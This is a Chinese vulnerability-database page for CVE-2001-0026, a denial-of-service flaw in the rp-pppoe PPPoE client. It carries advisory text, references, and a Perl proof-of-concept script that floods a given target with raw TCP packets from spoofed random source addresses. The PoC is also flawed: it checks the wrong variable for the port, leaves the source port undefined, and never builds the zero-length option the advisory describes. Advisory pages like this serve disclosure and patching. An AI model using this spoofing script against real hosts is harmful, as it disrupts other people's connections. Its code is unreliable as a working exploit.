rp-pppoe PPPoE客户端漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106129 漏洞类型 未知
发布时间 2000-12-11 更新时间 2005-05-02
CVE编号 CVE-2001-0026 CNNVD-ID CNNVD-200102-065
漏洞平台 Linux CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/20494
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200102-065
|漏洞详情
rp-pppoePPPoE客户端存在漏洞。远程攻击者借助ClampMSS选项和带零长度TCP选项的TCP数据包导致服务拒绝。
|漏洞EXP
source: http://www.securityfocus.com/bid/2098/info

Roaring Penguin Software's PPPoE is a freeware PPP over Ethernet client often used by ADSL subscribers running Linux or NetBSD.

PPPoE contains a possibly remotely exploitable denial of service vulnerability in its handling of TCP packets when the Clamp_MSS option is used. If PPPoE recieves a malformed TCP packet with a "zero-length option", PPPoE will go into an infinite loop. As a result, the ppp connection being supported by PPPoE will time out and be terminated. A manual re-start is needed to regain functionality.

This bug has been fixed by Roaring Penguin Software in a new version, see the solutions section. 

#!/usr/bin/perl
# POC script that causes a DoS in an PPP-over-Ethernet Link, in RedHat 7.0.
# Advisory: http://www.redhat.com/support/errata/RHSA-2000-130.html
# by dethy
use Net::RawIP;
use Getopt::Std;
getopts('d:s:p:c',\%args) || &usage;
if(defined($args{d})){$daddr=$args{d};}else{&usage;}
if(defined($args{s})){$src=$args{s};}else{$src=&randsrc;}
if(defined($port{p})){$port=$args{p};}else{&usage;}
if(defined($args{c})){$count=$args{c};}else{$count=10;}

sub randport(){
 srand;
 return $sport=(int rand 65510); 
 }

sub randsrc(){
  srand; 
  return $saddr=(int rand 255).".".(int rand 255).".".(int rand 255).".".(int rand 255); 
 }

 $packet = new Net::RawIP({ip=>{},tcp=>{}});
 $packet->set({ ip => { saddr => $src, 
			daddr => $daddr, 
			tos => 3 },
               tcp => { source => $sport, 
			dest => $port,
                        syn => 1, psh => 1 } });

 $packet->send(0,$count);

sub usage(){ die("pppoe-link POC DoS on RH7\n$0 -d <dest> -s <source> -p <port> -c <count>\n"); }
|参考资料

来源:BID
名称:2098
链接:http://www.securityfocus.com/bid/2098
来源:REDHAT
名称:RHSA-2000:130
链接:http://www.redhat.com/support/errata/RHSA-2000-130.html
来源:BUGTRAQ
名称:20001211DoSvulnerabilityinrp-pppoeversions<=2.4
链接:http://archives.neohapsis.com/archives/bugtraq/2000-12/0134.html
来源:XF
名称:rppppoe-zero-length-dos
链接:http://xforce.iss.net/static/5727.php
来源:MANDRAKE
名称:MDKSA-2000:084
链接:http://www.linux-mandrake.com/en/security/MDKSA-2000-084.php3
来源:CONECTIVA
名称:CLA-2000:357
链接:http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000357